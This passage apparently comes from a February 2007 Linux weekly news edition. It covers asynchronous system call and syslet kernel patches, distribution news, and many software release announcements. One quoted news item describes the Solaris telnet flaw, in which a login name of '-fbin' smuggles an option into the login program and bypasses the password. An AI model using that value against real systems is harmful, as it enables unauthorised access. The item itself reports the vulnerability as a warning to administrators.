- The new async() system call takes a system call number,
arguments for the system call, and a pointer to a location for the
final status code.
- The process's register set is saved, then the system call is executed
as usual.
- Should the kernel call schedule(), meaning that the system
call is about to block, the process will fork before blocking.
- The new child process returns to user space and continues
executing there. Meanwhile, the original process will finish out the
asynchronous system call.
The largest claimed advantage to this patch, beyond its simplicity, is that
there is almost no overhead if the asynchronous system call can be
completed without blocking. The fibril patch, instead, always runs
asynchronous calls in independent fibrils. Linus claims that almost all
asynchronous system calls can, in fact, be completed synchronously without
blocking, so he would really rather see little or no up-front cost in that
case.
There are various issues with Linus's patch. If the asynchronous call
blocks, for example, the return to user space will happen in a different
process - a change which could prove confusing to user space. Only one
asynchronous operation can be outstanding at any given time. There is also
no way to wait for an asynchronous operation to complete except to poll the
exit status. But this patch was never meant to be a complete solution; as
a proof of concept it is interesting.
For a rather more elaborate approach, Ingo Molnar's syslet patchset is worth a
look. With syslets, a user-space program can run system calls
asynchronously. Beyond that, however, it can load little programs into the
kernel and let them run independently.
To use syslets, the application starts by filling in one of these structures:
struct syslet_uatom {
unsigned long flags;
unsigned long nr;
long *ret_ptr;
struct syslet_uatom *next;
unsigned long *arg_ptr[6];
void *private;
};
Here, nr is the number of the system call to run, arg_ptr
holds pointers to the arguments, and ret_ptr tells the kernel
where to put the final status from the call. The private field is
not used by the kernel at all. We'll get to the other fields shortly.
Once the syslet_uatom structure is ready, the application can run
it with:
long async_exec(struct syslet_uatom *atom);
This call will start on the requested system call immediately. If that
system call never blocks, it will be run synchronously and the address of
the atom will be returned from async_exec(). Otherwise
the kernel will grab a thread from a pool and use that thread to return to
user space, continuing the system call in the original thread. The
application can then go off and do whatever makes sense - including running
more syslets - while the system call runs to completion.
What actually happens when the system call completes is a little more
complex and interesting, however. Unless user space has requested
otherwise, the kernel does not just complete the syslet after the
first system call runs; instead, it looks at the next field of the
syslet_uatom structure. If that field is non-NULL, it is
taken as the user-space address of the next syslet to be run by the
kernel. In other words, an application is not restricted to running
individual asynchronous system calls; it can chain up a whole series of
them to run without ever exiting the kernel. The cost of fetching a new
syslet atom is far less than a transition to user space and back, so there
is a significant performance improvement to be had just by chaining two
system calls together.
The final field in struct syslet_uatom is flags, which
controls how syslets are executed. Four of them
(SYSLET_STOP_ON_NONZERO, SYSLET_STOP_ON_ZERO,
SYSLET_STOP_ON_NEGATIVE, and SYSLET_STOP_ON_NON_POSITIVE)
will test the result of the current atom's system call and, possibly,
terminate execution of the syslet. In this way, for example, a chain of
system calls can be stopped early if one of them fails. It is also
possible to create a kernel-space loop which reads a file until no more
data is available.
The SYSLET_SKIP_TO_NEXT_ON_STOP modifies the above flags so that,
rather than terminating the syslet, the kernel skips to an atom found
immediately after the current one in the process's address space. This
flag allows a syslet to terminate a loop and move on to further processing
within the syslet. If an application knows that a syslet will block, it
can request asynchronous execution from the outset with
SYSLET_ASYNC. There is also a SYSLET_SYNC flag which
causes the whole thing to run synchronously.
Syslets do not have any variables of their own. To help with the writing
of useful programs, Ingo has added a new system call:
long umem_add(unsigned long *pointer, unsigned long increment);
This call simply adds the given increment to *pointer,
returning the resulting value.
The application can register a ring buffer with the kernel using the
async_register() system call. Whenever an atom completes, its
address will be stored in the next ring buffer entry; the application can
then use that address to find the system call status. The kernel will not
overwrite non-NULL ring buffer entries, so the application must
reset them as it consumes them. If the application needs to wait for
syslet completion, it can call:
long async_wait(unsigned long min_events);
This call will block the process until at least min_events have
been stored into the ring buffer.
This patch set, too, presents a number of unanswered questions. Once
again, signal handling has been punted for now. There's no end of security
implications which must be thought out; in the end, a number
of system calls will probably be marked as being off-limits for asynchronous
execution. There has still been no discussion on how this sort of
interface would play with the kevent patches - kevents seem to be concept
that nobody wants to talk about at the moment. 64/32-bit compatibility
could present interesting challenges of its own. And so on.
But the initial reaction to syslets appears to be positive (though Linus hates it); syslets might just point to
the form of the
fibril idea which eventually makes it into the mainline kernel.
Comments (10 posted)
Patches and updates
Kernel trees
Core kernel code
Development tools
- Junio C Hamano: GIT 1.5.0.
(February 14, 2007)
Device drivers
Documentation
Filesystems and block I/O
Memory management
Networking
Architecture-specific
Security-related
Virtualization and containers
- Rusty Russell: lguest.
(February 11, 2007)
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
Ubuntu's Feisty Fawn (aka 7.04) release is scheduled for mid-April. The
fourth Herd CD, an alpha release reasonably free of showstoppers,
should be out by the time you read this, for
most or all of the official variants (Ubuntu, Kubuntu, Xubuntu and
Edubuntu).
Ubuntu has always taken a middle road in
the free vs. non-free course of Linux distributions. Middle enough that
two Ubuntu-based distributions have variants that are working on both sides of
the fence. gNewSense strives for
100% FSF approved purity while Linux
Mint is willing to sacrifice some freedom for convenience.
Like Debian, its parent project,
Ubuntu has always provided some proprietary software, in the Multiverse
repository which is not enabled by default, similar to the non-free
repository in Debian.
Early in Feisty's development cycle it was reported
that Ubuntu would ship binary drivers by default in Feisty. Mostly it
sounded like it would be even easier to get at those drivers; however
according to the latest announcement from Ubuntu's Technical Board it
sounds pretty much like the status quo. "Ubuntu 7.04 will preserve the
status quo with respect to proprietary video drivers. As in previous
releases, these drivers will be provided for the convenience of users who
choose to use them, but they will not be activated by default."
This announcement also looked at the status of the PowerPC edition.
"Beginning with Ubuntu 7.04, the PowerPC edition of Ubuntu will be
reclassified as unofficial. The PowerPC software itself and supporting
infrastructure will continue to be available, and supported by a community
team."
Those interested may join the Ubuntu PowerPC Architecture
Team to work on the unofficial port. PowerPC releases will be
maintained for all supported earlier releases. PowerPC servers will be
supported until 2011 on Ubuntu 6.06 LTS.
Comments (5 posted)
New Releases
An abridged, "one-sheet" version of the Release Notes for Fedora 7 test1
(6.90) is now
available.
The full set of release notes will be released with test3.
Full Story (comments: none)
Trustix Secure Linux 3.0.5 RC 2 is out. This release adds postgresql
8.2.3, cpplus 3.3, samba 3.0.24, php 5.2.1, and lots of bug fixes and
security updates.
Full Story (comments: none)
Distribution News
Linspire and Canonical have sent out
a press release announcing a "technology partnership" between the two. The core of the deal appears to be that Linspire will base future versions of its distribution products on Ubuntu Linux rather than Debian. "
Linspire will continue combining proprietary drivers, codecs and
applications with open source software by default in their operating
systems. This approach, unique among Linux distributions, offers
out-of-the-box support for a broader range of software, hardware and
multimedia file types than the Debian or Ubuntu baseline alone."
Comments (none posted)
The
second call for nominations has gone
out in this year's Debian Project leader elections.
There is a proposed general resolution
which should soon be open for voting. "The Debian project resolves
that Debian developers allowed to perform combined source and binary
packages uploads should be allowed to perform binary-only packages uploads
for the same set of architectures."
Comments (none posted)
Inactive Debian developer accounts
will be
deleted using regular WaT (*W*here *a*re *T*hey?) runs to determine a
developer's status. "
Selection of the people included in those runs
will be done in a way that we avoid sending out such mails to active
people. As a good start we will take the upcoming DPL vote as an input
source, everyone who doesn't vote this year will be included in the first
run. * Please note that you can vote without expressing an opinion!
*"
The expiration of the Debian archive's signing key for 2006 has broken most of the installation media from
etch RC1. "The only RC1 images that should remain usable are the
full installation CDs and DVDs, but only when used without a network
mirror."
Comments (1 posted)
CentOS mailing lists will be available in German, French, Czech, Dutch,
Brazilian Portuguese and Spanish added to the existing English list.
Full Story (comments: none)
The Fedora Advisory Board mailing list is becoming more open. Membership
once required moderator approval, with a readonly list for those who wanted
to follow along by not post. Now the advisory board list is open to all
and the read-only list will disappear on March 1. "
This decision also
has the potential to lead to increased traffic on the list. Let's keep the
traffic on-topic and high in signal, versus noise. The list's job will be
to police its own."
Full Story (comments: none)
Distribution Newsletters
The Debian Weekly News for February 13, 2007 covers a competition to
augment and revise the current Secure Hash Standard, Debian etch on an old
ThinkPad notebook, the question of supporting package downloads, LDAP and
infrastructure updates, a final FOSDEM schedule, Debian powers New
Zealand's electoral enrollment, restructuring parts of the Debian website,
Debian-Installer Release Candidate 2, Debian GNU/Linux support from
Hewlett-Packard, the Call for Project Leader Nominations, Debian Live
Autobuilder, a first test report on Multiarch DVD, automatic installation
and removal tests, archive signing key for 2007, and much more.
Full Story (comments: none)
The
Gentoo
Weekly Newsletter for February 5, 2007 covers KDE team seeking help,
removal of mail-mta/qmail, interview with zzam, and several other topics.
Comments (none posted)
The
DistroWatch
Weekly for February 12, 2007 is out. "
It was a fairly quiet
week, with only Mandriva's new beta release and Linspire's announcement
about its partnership with Ubuntu making major headlines. In this week's
issue, we have the honour to bring you a rare interview with a female
entrepreneur and Linux enthusiast: Dianne Ursini from Pioneer Linux. The
news section then starts with a sad news of Florent Villard (Warly) leaving
his employer (Mandriva) of eight years, before it continues with an
observation about the Linspire announcement, comment on the Fedora release
notes issue, update on the second release candidate of Debian Installer,
and information about the status of Ulteo. Finally, don't miss several
interesting links, such as the story of the RPM package manager and an
interview with "Jaromil", the founder and developer of the dyne:bolic
multimedia live CD."
Comments (none posted)
Distribution meetings
Andreas Schuldei reports on a couple of upcoming Debian meetings; one in
France and one in Brussels (during FOSDEM).
Full Story (comments: none)
A location has been set for DebConf8, the city of Mar del Plata,
Argentina. "
The estimated dates are the second and third weeks of
August, 2008. Which means that this will be the first DebConf to take place
in winter."
Full Story (comments: none)
Some upcoming Ubuntu events include Ubuntu Education Summit, 3-4 May 2007
in Sevilla, Spain, Ubucon - Sevilla, 5 May 2007 in Sevilla, Spain, Ubuntu
Developer Summit, 6-11 May 2007 in Sevilla, Spain and Ubuntu Live, 22-24
July 2007 in Portland, Oregon, USA.
Full Story (comments: none)
Newsletters and articles of interest
Mayank Sharma
talks
with Denis "Jaromil" Rojo. "
Denis "Jaromil" Rojo
(http://en.wikipedia.org/wiki/Jaromil) is an artist and a FOSS hacker. He's
popularly known for Dyne:Bolic (http://www.dynebolic.org/), a Live CD
distribution that contains several applications for audio and video
manipulation. As a programmer, he is author of several free software that
present new possibilities for online radios. As an artist he is known for
his netart performances (http://lab.dyne.org/JaromilTalks) and for crafting
the most elegant and efficient 13-character forkbomb ever written
(http://www.digitalcraft.org/?artikel_id=292)."
Comments (1 posted)
Distribution reviews
Linux.com
plays with GoboLinux. "
From the start, GoboLinux's developers had no intentions of adding another package format like RPM or Debian packages. Furthermore, depending on the popularity of an application it might or might not be available in the RPM or Debian package formats. But all applications will be available as a compressed source tarball.
Hisham H. Muhammad, who developed GoboLinux along with André Detsch, explains that a tarball can simply be unpacked, and then three commands, 'configure, make, make install', should install it."
Comments (12 posted)
DesktopLinux
looks at the
release of EnGarde Secure Community Edition, version 3.0.12.
"
Guardian Digital on Feb. 7 announced the release of a new stable
version EnGarde Secure Community Edition, version 3.0.12. The
security-oriented Linux distribution features a 2.6.19 kernel and the
latest versions of several server-based applications, and is intended for
use as a Web, DNS, email, database, and general Internet server."
Comments (none posted)
Linux.com
reviews the
STUX live CD. "
STUX is a Slackware/Knoppix-powered live CD with the
Morphix-like ability to build a custom ISO. While the combination has high
potential, this implementation leaves something to be desired. It's worth
the experience if you enjoy using new distributions, but if you're looking
to replace your current desktop OS, look elsewhere."
Comments (none posted)
Page editor: Rebecca Sobol
Development
The
eyeOS project, developed by the
eyeOS development team, is
a cross-platform open-source Web Operating System, a.k.a. a
Web Office:
eyeOS is an Open Source Web Desktop Environment, commonly known as Web Operating System (Web OS) or Web Office. eyeOS is Open Source Software, and can be downloaded or used through the official eyeOS server. The basic System comes with some office and PIM applications.
The primary concept behind eyeOS is that it is a desktop system that
is completely accessed from a web browser.
File storage and most of the application processing is handled by
the remote host. Officially supported
browsers include Internet Explorer, Firefox, Safari, and Opera.
Other standards-compliant CSS capable browsers should also work.
The demo page
gives a pretty good idea of what eyeOS is all about.
The standard eyeOS applications include:
- eyeHome, a directory browser
- eyeEdit, a word processor
- eyeCalendar, a calendar system
- eyePhones, a contact manager
- eyeCalc, a desktop calculator
- eyeMessages, an email client
- eyeBoard, a bulletin board
- eyeNav, a web browser
- eyeRSS, an RSS reader
- eyeOptions, an option configurator
- eyeInfo, a system information display
The
eyeApps applications database
manager allows additional applications to be run on the system.
The current list of eyeApps include:
a PDF viewer, multimedia applications, a Webmail client, a blog applet,
an encryption pad, a music player, a Google map viewer, a port scanner
and some games. Clearly, the system is in need of a fractal viewer called
eyeCandy.
Custom themes and wallpapers can be obtained from the
eyeLooks, some of the
example themes resemble other popular desktops.
An interesting feature of eyeOS is the online
translation system, support for new languages can be provided by
filling in a web form.
The eyeOS server is claimed to run on any platform that has a web server
with PHP installed. No database manager is required.
Linux/Unix is the recommended server platform, according to the project
documentation.
Stable version 0.9.3-5 of eyeOS was recently
released:
We have just released eyeOS 0.9.3-5, which includes two main improvements: The first one, focused into user security, improves the way eyeHome manages the files. The new system allows all files to be uploaded with no restrictions and uses the eyeOS XML FileSystem to recognize it's author, date of upload and file name.
The second improvement is the elimination of the ancient eyeTrash (which was not updated since 0.8.x versions of eyeOS). The new system uses eyeHome as file explorer for the trash, displaying "Trash" in the Sites list. All actions have been moved to eyeHome Actions bar and the translations of eyeTrash have been merged to eyeHome too. The Trash icon has been updated to use this new system.
Some other small bugs have been also solved.
The
eyeOS Blog
has the latest news on the system, it mentions the achievement of
100,000 registered users on the public eyeOS server as well as an
upcoming 1.0 release.
There are some tradeoffs to consider with such a system.
Performance is limited by the available network bandwidth, and GUI
capabilities are limited by going through a browser interface.
On the positive side, it should be possible to access an eyeOS
desktop from anywhere with a browser and an internet connection.
System management issues are also centralized and client machines
only require a working web browser.
The system is available for use by anyone with a web browser and
an internet connection, those wishing to run their own server can
download
the software.
Comments (3 posted)
System Applications
Clusters and Grids
Version 0.24.1 of the Java Parallel Processing Framework (JPPF) has been
announced.
"
The Java Parallel Processing Framework is a grid framework for Java, focused on performance and ease of use.
The JPPF team has the pleasure to announce a new maintenance release.
The communications and execution performance was increased by 10%
Numerous bugs were fixed in the server, increasing its stability and scalability.
A bug was fixed in the distributed class loader, that would cause the client to crash.
The graphical administration console was upgraded to use Substance L&F v3.1 and JFreeChart v1.0.3."
Comments (none posted)
Database Software
John Ferguson Smart
introduces Hibernate 3 annotations on O'Reilly.
"
Over the years, Hibernate has become close to the defacto standard in the world of Java database persistence. It is powerful, flexible, and boasts excellent performance. In this article, we look at how Java 5 annotations can be used to simplify your Hibernate code and make coding your persistence layer even easier."
Comments (none posted)
Version 5.1.15 beta of the MySQL DBMS is available.
"
We are proud to present to you the MySQL Server 5.1.15 beta
release, a new beta version of the popular open source database.
Bear in mind that this is a beta release, and as any other pre-
production release, caution should be taken when installing on
production level systems or systems with critical data."
Full Story (comments: none)
New security-fix releases of the PostgreSQL DBMS
have been announced.
"
The PostgreSQL Global Development Group releases today a security update for all PostgreSQL 8.X versions: minor versions 8.2.3, 8.1.8, 8.0.12. This release replaces the security release from February 5th, which contained a type-casting bug affecting many users.
If you downloaded a copy of 8.2.2, 8.1.7 or 8.0.11, you should discard that version and install the updated versions instead."
Comments (none posted)
The February 11, 2007 edition of the PostgreSQL Weekly News
is online with the latest PostgreSQL DBMS articles and resources.
Full Story (comments: none)
Version 3.3.13 of the
SQLite DBMS
is out.
"
This version fixes a subtle bug in the ORDER BY optimizer that can occur when using joins. There are also a few minor enhancements. Upgrading is recommended."
Comments (none posted)
Embedded Systems
Version 0.0.6 of MiniWebsvr
is available with several new capabilities.
"
MiniWebsvr is a small web server that aims to one day be embeddable.
This version is a stand-alone web server that supports OPTIONS,HEAD and GET, with support for If-Modified-Since and Range HTTP requests to save on bandwidth."
Comments (none posted)
LDAP Software
Version 1.3.2 of LAT, the LDAP Administration Tool, is available.
"
This is the development branch that will eventually become
1.4."
Full Story (comments: none)
Mail Software
Version 20070212 of the
Postfix
mail transfer agent is available. See the
change log for details.
Comments (none posted)
Printing
Version 1.2.3 of
Gtk-LP has been
announced.
"
GTK LP for CUPS is a frontend for the lpr that comes with CUPS. It is written to make it easy to use nearly all the options from CUPS without knowing them by name. For print-admins, there is also an pretty simple queue tool implemented."
Comments (none posted)
The CUPS printer project has published a
Mini HowTo
for the Netgear WGPS606 wireless print server.
"
I had a terrible time getting my HP1200 configured on the Netgear WGPS606 as a linux only user. These are the simple steps on how to go about configuring it."
Comments (1 posted)
Web Site Development
Version 0.3.2 Beta of Drake CMS
is available with bug fixes and other improvements.
"
Drake CMS is a light-weight dynamic web authoring and content manag[e]ment system; its major features are the support of any database system (plus an embedded flatfile database), security, speed, easy management and customization."
Comments (none posted)
Version 3.0 alpha2 of the Plone web content management system is out.
"
Since the alpha1 release a
tremendous amount of work has been done. A good indication of this is the
list of PLIPs that have been added in this release".
Full Story (comments: none)
Version 1.7.0 of Segue
has been announced.
"
Segue is an open source collaborative content management system designed for e-learning that combines the ease of use of course management systems with the flexibility of weblogs for creating various types of sites including course, news, and journal.
This new version includes a number of bug fixes as well as introduces three new features".
Comments (none posted)
Raju Varghese
analyzes web logs in 3D with Perl and gnuplot.
"
There are well over a hundred web server log analyzers (Google Directory for Log Analysis) or web statistics tools ranging from commercial offerings such as WebTrends to open source ones such as AWStats. These take web server logfiles and display numbers such as page views, visits, and visitors, as well as graphs over various time ranges. This article presents the same data in those logfiles in a very different way: as a 3D plot. By the end of this article, I hope you will agree with me that the visualization described herein is a novel and useful way to view the content of logfiles."
Comments (none posted)
Desktop Applications
Audio Applications
The Alsaplayer audio player has some new features and the
development has been migrated from cvs to svn.
"
After the release of the long wanted bugfix Alsaplayer-0.99.77 release last
week, I am very pleased to announce the release of a new exiting python module for Alsaplayer.
This module is the work of Austin Bingham, a new active developer in the
Alsaplayer team.
Another developer just joined us, Peter Lemenkov. He is working on some new
input plugins, included a wavpack plugin."
Full Story (comments: none)
Business Applications
The first edition of the Nuxeo Weekly News has been launched.
"
You are reading the first issue of Nuxeo Weekly News, a newsletter
that will summarise every week everything interesting that has
happened in the Nuxeo
open source ECM community."
Full Story (comments: none)
Version 2.7.11 of
SQL-Ledger, a web-based accounting
system, is out with the following change:
"
added type of contact to differentiate between companies and persons".
Comments (none posted)
Calendar Software
Version 3.2 of pAgenda, a cross-platform calendar and schedule manager,
has been announced.
The description states:
"
Uses sqlite DB to handle multiple schedules with ease in single, small, portable files -- easy to backup or transfer. Simple, functional and the strongest feature is how well it prints out a daily schedule with a single-click.
It can also keep track of contacts as well as appointments, import contacts and appointments from other schedule/users of pAgenda."
Comments (none posted)
Desktop Environments
Development Release 2.18.0 Beta 2 of the GNOME desktop is available for
testing.
"
With this release, we'll enter the string freeze: no string changes may
be made without confirmation from the l10n team and notification to both
the release team and the GDP. Remember we're already API/ABI frozen,
feature frozen and UI frozen :-)"
Full Story (comments: none)
The following new GNOME software has been announced this week:
You can find more new GNOME software releases at
gnomefiles.org.
Comments (none posted)
The following new KDE software has been announced this week:
You can find more new KDE software releases at
kde-apps.org.
Comments (none posted)
The February 11, 2007 edition of the
KDE Commit-Digest has been
announced.
The content summary says:
"
Much-requested "Page scaling" zoom mode
introduced to KHTML. Work on the XPS document format backend, and
intergration of a Phonon-based audio player for embedded document sounds in
okular. More maps added to KGeography. KMines becomes the latest game to move
toward a scalable graphics interface, with continued work on KBlackBox and
KGoldRunner. scuba and wmap datasource additions to Kst. A better fullscreen
interface for Digikam. Continued improvement in the KDE Fonts Manager. Amarok
2.0 development progresses at full speed. Initial import of version 2 of the
Gwenview image viewer, and a possible KBabel replacement, KAider, into KDE
SVN. Oxygen icons become further integrated into the desktop, with renamings
and the setting of the theme as the KDE default."
Comments (none posted)
The following new Xorg software has been announced this week:
More information can be found on the
X.Org Foundation wiki.
Comments (none posted)
Desktop Publishing
Version 1.4.4 of LyX, a GUI front-end for the TeX typesetting system,
has been announced.
"
This is of course
a bug fix release, but some new features sneaked in, among which:
Outline support: it is now possible to move around parts of
documents in the Table of Contents dialog.
Add new UI settings default-autotoolbars and default-alltoolbars
allowing to select what toolbars are active or shown automatically.
Improved documentation."
Full Story (comments: none)
Fonts and Images
Version 2.2 of fntsample
has been announced.
"
fntsample is a program for making font samples that show Unicode coverage of the font. The samples are similar in appearance to Unicode charts. Samples can be saved as PDF or PostScript files."
Comments (1 posted)
Games
Version 0.1.2 of libtprl
has been announced.
"
Thousand Parsec has released a new version of libtprl, a C++ ReadLine library. libtprl is used by the C++ server, tpserver-cpp.
There are changes to the actual library this time. New methods added and some small cleanup. Added were methods for getting the current commandset, setting whether readline catches signals, redisplaying the line and force redisplaying the line, and setting the finish of completions (disabling the filename completion)."
Comments (none posted)
Version 1.7 of Open Yahtzee
is available.
"
Open Yahtzee 1.7 features enhancements to game play such as new dice graphics and dice animation. Another important change that now Open Yahtzee allows scoring according to the Yahtzee Joker rules, that means that if you have a yahtzee but already scored (even a zero) in the yahtzee box you will be able to score the dice in any open box in the lower section (assuming you scored already the suitable box in the upper section). The new version also int[ro]duces several bug-fixes."
Comments (none posted)
The WorldForge game project
has announced
the release of Sear 0.6.3.
"
This version of Sear has a new method of representing character appearance based on clothing entities. It also fixes a crasher bug many users were reporting on Intel hardware. It also uses the newer Guichan 0.5.0 library."
Also, version 1.1 of WFUT, the WorldForge Update Tool
has been announced.
Comments (none posted)
Instant Messaging
Version 0.6 of
Chirpy!
is out.
"
Chirpy! is an Open Source
online quote management system. It allows you to keep a database of quotes by
friends and foes. It is most useful for quotes collected on IRC channels.
The Chirpy! project originated mainly out of frustration caused by
the Rash Quote Management System,
due to its numerous bugs and its lack of efficiency and extensibility. While its
developers openly admit that it was a quick job, eventually, this became
unacceptable."
Comments (none posted)
Medical Applications
LinuxMedNews
has announced
the release of version 0.2.4.2 of the GNUmed medical record system.
"
For this version patient consultation management has been reworked and stabilized. New features include document import via an XSane interface, better episode management, the ability to export documents from the archive to storage media, drag and drop of files onto GNUmed for even easier archival, DICOM viewer integration, a webbrowser link to medical information on the web, a custom database backup script, a stage 2 link to the ifap index drug database as well as a framework for custom script hooks."
Comments (none posted)
Office Applications
Version 0.98.1 of
Xfe,
a light weight file manager for the X window system, is available.
"
This release mainly fixes a serious crash bug and some minor bugs. The czech language translation has also been updated."
Comments (none posted)
KDE.News
reviews a couple of KDE4 document viewers. "
Users of KDE 4 are in for a treat with both okular and Ligature, as they are both shaping up to support a wide variety of (occasionally overlapping) media formats. But since they can both be embedded into KDE applications using standard interfaces, a user should be equally happy using either one of these viewers."
Comments (6 posted)
Video Applications
Version 2.72.1 of ARToolKit
is available with bug fixes.
"
The Augmented Reality Tool Kit (ARToolKit) captures images from video sources, optically tracks markers in the images, and composites them with computer-generated content using OpenGL. Dual-licensed, under the GPL, plus commercially by ARToolworks, Inc."
Comments (none posted)
Web Browsers
The Alpha 2 release of Gran Paradiso
has been announced.
"
This is the second milestone released from the Gecko 1.9 branch. There are no significant user interface changes. Core layout and rendering changes include support for the Web Applications 1.0 API for changing stylesheets, ACID2 test compliance, and improvements in the Cairo graphics layer. As mentioned earlier, Gran Paradiso the project codename for Firefox 3."
Comments (none posted)
Word Processors
Version 1.0 of Open XML Translator
is available on the Windows platform.
"
Open XML Translator provides tools to build a technical bridge between the Open XML Formats and Open Document Format(ODF). As the first component of this initiative, the ODF Add-in for Microsoft Word 2007 allows to Open & Save ODF documents in Word."
Comments (none posted)
Miscellaneous
Release 2.1 of
Visprint,
a fractal fingerprint generator, is out with bug fixes and new capabilities.
"
Visprint makes cool fractal fingerprint png images based on the contents of any file. The image will be different for almost every file with even slightly different contents. Visprint uses the IFS fractal generation process, pioneered by Michael Barnsley. It is a way to create images which are self-similar to infinite depths. In other words, the picture is made up of smaller versions of itself."
Comments (none posted)
Languages and Tools
C
Version 4.1.2 RC2 of the Gnu Compiler Collection (GCC) is available.
"
The changes relative to RC1 are fixes for:
1. PR 29683: a wrong-code issue on Darwin
2. PR 30370: a build problem for certain PowerPC configurations
3. PR 29487: a build problem for HP-UX 10.10 a code-quality problem for
C++ on all platforms". GCC 4.1.2 should be released within a week.
Full Story (comments: none)
Caml
The February 13, 2007 edition of the Caml Weekly News
is out with new Caml language articles.
Full Story (comments: none)
PHP
Version 5.2.1 of
PHP has been released.
"
The PHP development team would like to announce the immediate availability of PHP 5.2.1. This release is a major stability and security enhancement of the 5.X branch, and all users are strongly encouraged to upgrade to it as soon as possible."
Comments (none posted)
Tcl/Tk
The February 7, 2007 edition of the Tcl-URL! is online with new
Tcl/Tk articles and resources.
Full Story (comments: none)
Cross Compilers
A new port of the GNU 68HC11/12 cross-compiler
has been announced.
"
I have ported the kernel MCX11 to MCX12 in order to use it with the MC9S12 microcontrollers family."
Comments (none posted)
Editors
Version 0.5.1 of
peppy,
the `Proximated Emacs Powered by Python,
has been announced. Peppy is:
"
An experiment using the modern software development process -- this is a wxPython/Scintilla-based editor written in and extensible through Python. It attempts to provide an XEmacs-like multi-window, multi-tabbed interface using the Advanced User Interface (wx.aui) framework of wxPython."
Comments (none posted)
Libraries
Version 3.9.3 of FreeImage, an open-source library which supports the
PNG, BMP, JPEG, TIFF image formats,
is available.
"
This maintenance release improves the speed of the GIF encoder, adds a new JPEG downsampling feature (useful to generate thumbnails) and also provides a better MacOSX makefile."
Comments (none posted)
Page editor: Forrest Cook
Linux in the news
Recommended Reading
Samba developer Jeremy Allison
writes about
software development topics. "
Most software development is a local
activity, done directly for the benefit of the people writing it. The
wonderfully bureaucratic sounding "Directorate General for Enterprise and
Industry" of the European Union recently commissioned an extensive study on
what they call FLOSS (Free/Libre/Open Source Software)."
Comments (2 posted)
Anybody who runs Solaris systems should have a look at
this Technology Review article by Simson Garfinkel on the recently-disclosed telnet vulnerability. "
What Maynor discovered is that an attacker can try to log in with a user name like '-fbin.' The '-fbin' is passed along to the log-in program, which misinterprets the "-f" as a command from the operating system to log the user in to the specified account without asking for a password." For added fun, consider that Solaris 10 enables telnet by default, and that the vulnerability
is not particularly new.
Comments (18 posted)
Linux.com
looks at two
decisions by the Ubuntu Technical Board. "
Ubuntu CTO Matt
Zimmerman has announced two Ubuntu Technical Board decisions that will
affect the upcoming Feisty Fawn release, due out in April of this year. For
the Feisty release, proprietary video drivers are out of the default
install, and the PowerPC port of Ubuntu is being downgraded to an
unofficial release."
Comments (36 posted)
Trade Shows and Conferences
Linux-Watch
covers
the recent Linux Wireless Summit.
"
Once there, according to Stephen Hemminger, Linux Wireless Summit co-coordinator and a Linux software developer at the Linux Foundation, the attendees had a very productive meeting. Still, it's been slow going in some critical areas of Linux and WiFi, according to John Linville, the Linux wireless software maintainer. In particular, Linville reported that development work is proceeding too slowly on a new 802.11 stack (d80211); and with a new WiFi API (cfg80211), "development is even slower.""
Comments (none posted)
Linux-Watch
looks forward
to LinuxWorld OpenSolutions Summit, which opens this week in New York
City. "
During the conference, attendees will network with their
business-oriented Linux peers and learn from their experiences -- mistakes
and successes -- through case studies. The conference will also feature
in-depth technical presentations by leading Linux and open source
experts."
Comments (none posted)
LXer has a
look at
SCALE 5X day one. "
I have to tell you this is one big event,
with over 70 booths and thousands of attendees this is by far the biggest
SCaLE event ever. I will be posting pictures I have taken in the next few
days. I have just been trying to take it all in. I met a man that has only
been using Linux off of a live-CD that was given to him a couple of months
ago. I asked him why wanted to switch to Linux and why he came to SCaLE. He
told me that he is tired of Windows crashing and taking all of his music
with it and he is attending SCaLE to get some help in installing Linux on
his machine for good. He came to the right place."
Comments (none posted)
Linux.com
covers the
fifth annual Southern California Linux Expo. "
Most IT conferences,
it seems, start with a keynote around 9 a.m., which means that attendees
have to be queued up for registration by 8 a.m., which is a little earlier
than is reasonable for people who've just arrived the night before on a
redeye flight. SCALE's registration started at 9 a.m. on Saturday, with
talks starting at 10 a.m., and the exhibit floor opening at the same
time. SCALE's publicity chair, Orv Beach, says that the organizers decided
to avoid keynotes because they wanted the sessions to be all about
education, and that SCALE organizers didn't think that keynotes met that
standard -- though they may re-evaluate that for future SCALE
events."
Comments (none posted)
The Jem Report has a
review of
the Women in Open Source mini-conference at the Southern California Linux
Exposition (SCALE 5X). "
The subject of women in free/open source
software is one that had not been previously explored in SCALE or other,
similar conferences to date. Viewing its debut was, to say the least, an
extrordinarily interesting experience. Most of the speakers were
experienced in giving presentations of this kind, but had previously been
the only or one of few female speakers at other free software
conventions."
Comments (none posted)
Companies
Linux-Watch
looks at JBoss
founder Marc Fleury. "
Marc Fleury, founder of JBoss and often
controversial open source, leader has left Red Hat. The move came as no
surprise to many in the industry. In a statement, Fleury wrote, "I have
done what I can to help Red Hat succeed. People need to understand that
Open Source is a tsunami that is transforming the software industry in its
wake and its inevitability is now well beyond challenge or the force of
individual personality.""
Comments (none posted)
ZDNet
reports
that Sun will probably use GPLv3 for Java and Solaris once that license
becomes available. "
The question is which open-source license should
govern the building of projects out of the company's technology crown
jewels. The open-source Solaris project began with a Community Development
and Distribution License (CDDL), and open-source Java employs version 2 of
the General Public License (GPL). Now, though, Sun likes the idea of
governing both projects with the upcoming GPL version 3, Chief Executive
Jonathan Schwartz said in a speech and an interview at the company's
analyst summit here Tuesday."
Comments (1 posted)
Linux at Work
heise online
covers
the launch of the CHiC cluster system.
"
On February 7, the CHiC massive parallel Linux cluster with 2,152 processors distributed across 538 server nodes went into operation in Chemnitz. The new Revision F generation of AMD's Opteron CPUs, which support DDR2 RAM and AMD's "Secure Virtual Machine (SVM) virtualization technology, are used. Infiniband is used to connect the nodes, which are equipped with IBM server boards."
Comments (none posted)
Interviews
Linux.com
takes a
look at Sulamita Garcia and LinuxChix Brazil. "
A lot of people
have bemoaned the lack of women participating in open source communities,
but Sulamita Garcia is one of the few who have stepped up to do something
about it. A Slackware user from Florianopolis, Brazil, Garcia has been
heading up LinuxChix Brazil for four years."
Comments (11 posted)
Don Marti
interviews Jeremy Allison of the Samba project.
"
LinuxWorld: Now the reason that you left Novell has to do with Microsoft and Novell setting up a deal to in effect pay Microsoft a patent royalty on copies of Linux sold.
